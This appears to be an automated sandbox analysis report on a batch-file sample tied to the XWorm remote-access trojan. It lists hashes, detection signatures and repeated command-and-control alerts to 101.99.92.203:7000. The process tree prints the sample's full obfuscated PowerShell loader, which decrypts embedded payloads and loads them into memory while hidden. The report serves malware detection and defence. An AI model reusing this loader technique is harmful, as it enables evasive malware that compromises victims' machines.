Edit tour

Windows Analysis Report
b.cmd

Overview

General Information

Sample name:	b.cmd
Analysis ID:	1542729
MD5:	22f8f4191985b660d43620eb8d56dc57
SHA1:	f44ff1478083e15c97231eafc098af44f728aa02
SHA256:	91867f295ac459c82807864841770842cd2f4b254af3f3eb36c74438dff2c8a0
Tags:	CloudflareTunnelsRATcmduser-JAMESWT_MHT
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

AI detected suspicious sample

Obfuscated command line found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Suspicious powershell command line found

Uses dynamic DNS services

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6304 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\b.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 5772 cmdline: cmd /c \"set __=^&rem\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 5496 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\b.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3120 cmdline: cmd /c \"set __=^&rem\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

cmd.exe (PID: 3168 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\b.cmd';$rWNT='DecpxHCopxHCmppxHCrespxHCspxHC'.Replace('pxHC', ''),'MaTGyrinTGyrMTGyroTGyrdTGyrulTGyreTGyr'.Replace('TGyr', ''),'CrYsKteYsKtateYsKtDYsKteYsKtcrYsKtypYsKttoYsKtrYsKt'.Replace('YsKt', ''),'Idnlzndnlzvdnlzokdnlzednlz'.Replace('dnlz', ''),'TraGoiknsfGoikoGoikrmFGoikinaGoiklBlGoikockGoik'.Replace('Goik', ''),'LoStkNadStkN'.Replace('StkN', ''),'FroMxWcmBaMxWcse6MxWc4StMxWcriMxWcngMxWc'.Replace('MxWc', ''),'EnrgYjtrrgYjyrgYjPorgYjinrgYjtrgYj'.Replace('rgYj', ''),'CqJGUopqJGUyqJGUTqJGUoqJGU'.Replace('qJGU', ''),'ElywTEeywTEmenywTEtAywTEtywTE'.Replace('ywTE', ''),'ReaMpXgdLMpXgineMpXgsMpXg'.Replace('MpXg', ''),'CeuHLheuHLangeuHLeExeuHLteeuHLnseuHLioneuHL'.Replace('euHL', ''),'SKlTEpliKlTEtKlTE'.Replace('KlTE', ''),'GzasmetzasmCuzasmrrzasmentzasmPrzasmocezasmszasmszasm'.Replace('zasm', '');powershell -w hidden;function OgEIm($Xyfkn){$KStrb=[System.Security.Cryptography.Aes]::Create();$KStrb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KStrb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KStrb.Key=[System.Convert]::($rWNT[6])('xA1+WTJaPCUsOeL/aM8gYjpdFXCHAzsSe7O9jqgG6tE=');$KStrb.IV=[System.Convert]::($rWNT[6])('o+k4tdVDsXdevRbseXqo5Q==');$OoABI=$KStrb.($rWNT[2])();$gCRFY=$OoABI.($rWNT[4])($Xyfkn,0,$Xyfkn.Length);$OoABI.Dispose();$KStrb.Dispose();$gCRFY;}function bkQvC($Xyfkn){$pXxPg=New-Object System.IO.MemoryStream(,$Xyfkn);$ztkwM=New-Object System.IO.MemoryStream;$RxDER=New-Object System.IO.Compression.GZipStream($pXxPg,[IO.Compression.CompressionMode]::($rWNT[0]));$RxDER.($rWNT[8])($ztkwM);$RxDER.Dispose();$pXxPg.Dispose();$ztkwM.Dispose();$ztkwM.ToArray();}$QaWhK=[System.IO.File]::($rWNT[10])([Console]::Title);$TOEth=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 5).Substring(2))));$kobGz=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 6).Substring(2))));[System.Reflection.Assembly]::($rWNT[5])([byte[]]$kobGz).($rWNT[7]).($rWNT[3])($null,$null);[System.Reflection.Assembly]::($rWNT[5])([byte[]]$TOEth).($rWNT[7]).($rWNT[3])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

powershell.exe (PID: 1800 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 3624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)

cleanup

Sigma Signatures

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\b.cmd" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5496, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1800, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T08:51:31.380832+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:51:41.905177+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:51:46.067340+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:00.757563+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:11.907007+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:15.438912+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:18.469264+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:20.187649+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:23.631494+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:28.870044+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:29.360012+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:30.430971+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:33.993102+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:34.133769+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:34.242315+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:41.908748+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:43.392634+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:44.236122+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:44.361105+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:44.422913+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:44.491780+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:44.747195+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:49.733611+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:50.921310+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:53.999681+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:54.880461+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:55.053528+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:59.966453+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:00.028670+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:00.045747+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:00.076089+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:00.083376+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:00.163384+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:03.091908+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:10.278524+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:11.887538+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:20.601582+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:25.684151+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:30.913282+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:31.030649+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:31.147691+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:31.336532+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:32.476799+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:33.961008+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:36.616631+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:36.734613+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:36.854293+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:41.995606+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:42.503843+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:42.632949+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:52.741987+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:52.859064+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:52.943970+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:52.960276+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:52.976127+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:53.289174+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:56.390663+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:58.676357+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:02.665776+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:07.668156+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:08.507500+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:08.624469+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:08.753563+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:11.912869+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:23.336560+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:24.211211+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:34.462621+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:34.580319+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:35.258186+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:35.956947+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:38.992547+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:41.908904+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:42.164751+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:44.724773+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:44.843354+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:49.040667+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:54.882756+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:54:54.999825+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:01.977422+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:04.382703+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:04.992424+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:05.093553+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:05.109200+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:05.226404+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:10.062538+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:12.211600+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:12.211666+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:55:24.727210+0200	2852870	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T08:51:31.606047+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:51:46.077208+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:00.761855+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:15.440755+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:18.473454+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:20.189371+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:23.633999+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:28.872153+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:29.368529+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:30.433021+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:33.997377+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:34.135697+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:34.184661+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:34.192609+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:34.244152+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:43.397341+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:44.238238+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:44.362969+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:44.427220+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:44.499829+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:44.751256+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:49.736759+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:50.923858+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:54.002242+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:54.884005+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:55.056128+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:52:59.971039+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:00.030487+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:00.046992+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:00.077688+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:00.133615+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:00.164856+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:03.097657+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:10.281806+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:20.604015+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:25.689628+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:30.915218+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:31.032233+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:31.149558+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:31.337967+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:32.478538+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:33.963068+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:36.619425+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:36.735834+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:36.857389+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:42.505494+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:42.634493+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:52.746689+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:52.864194+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:52.947376+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:52.966537+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:52.980186+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:53.295160+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:56.392838+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:53:58.678258+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:02.667429+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:07.676210+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:08.510187+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:08.625811+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:08.754877+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:23.344229+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:24.215005+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:34.465448+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:34.583186+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:35.261598+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:35.959915+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:39.000265+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:42.166457+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:44.726261+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:44.844727+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:49.049263+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:54.885849+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:54:55.004059+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:55:01.979041+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:55:04.384220+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:55:04.995620+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:55:05.099330+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:55:05.111333+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:55:05.228286+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:55:10.063221+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP
2024-10-26T08:55:24.728281+0200	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49732	101.99.92.203	7000	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-26T08:51:41.905177+0200	2852874	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:11.907007+0200	2852874	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:52:41.908748+0200	2852874	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
2024-10-26T08:53:11.887538+0200	2852874	1	Malware Command and Control Activity Detected	101.99.92.203	7000	192.168.2.4	49732	TCP
